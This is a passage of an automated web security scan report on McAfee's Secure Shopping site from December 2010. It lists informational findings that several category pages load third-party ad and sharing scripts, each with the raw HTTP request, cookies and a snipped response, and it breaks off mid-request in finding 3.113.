<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Stuffed Toys at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.104. http://secureshopping.mcafee.com/browse/baby/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/travel/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:54 GMT
Content-Length: 65993

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Travel at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.105. http://secureshopping.mcafee.com/browse/baby/travel/baby-carriers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/baby-carriers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/travel/baby-carriers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:56 GMT
Content-Length: 63749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Carriers at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.106. http://secureshopping.mcafee.com/browse/baby/travel/car-seats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/car-seats/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/travel/car-seats/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:57 GMT
Content-Length: 56028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Car Seats at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.107. http://secureshopping.mcafee.com/browse/baby/travel/strollers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/strollers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/travel/strollers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:57 GMT
Content-Length: 61628

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Strollers at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.108. http://secureshopping.mcafee.com/browse/clothing-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/clothing-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:00 GMT
Content-Length: 69640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Clothing & Accessories at McAfee Secure Shopping - Search, D
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.109. http://secureshopping.mcafee.com/browse/clothing-accessories/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/jewelry-watches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/clothing-accessories/jewelry-watches/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:05 GMT
Content-Length: 60192

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Jewelry & Watches at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.110. http://secureshopping.mcafee.com/browse/collectibles-art/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/collectibles-art/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/collectibles-art/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:48 GMT
Content-Length: 45424

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Collectibles & Art at McAfee Secure Shopping - Search, Disco
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.111. http://secureshopping.mcafee.com/browse/computers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/ HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:49 GMT
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:49 GMT
Content-Length: 60648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Computers at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.112. http://secureshopping.mcafee.com/browse/computers/accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:05 GMT
Content-Length: 55317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Accessories at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.113. http://secureshopping.mcafee.com/browse/computers/accessories/audio-video-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/audio-video-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/audio-video-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
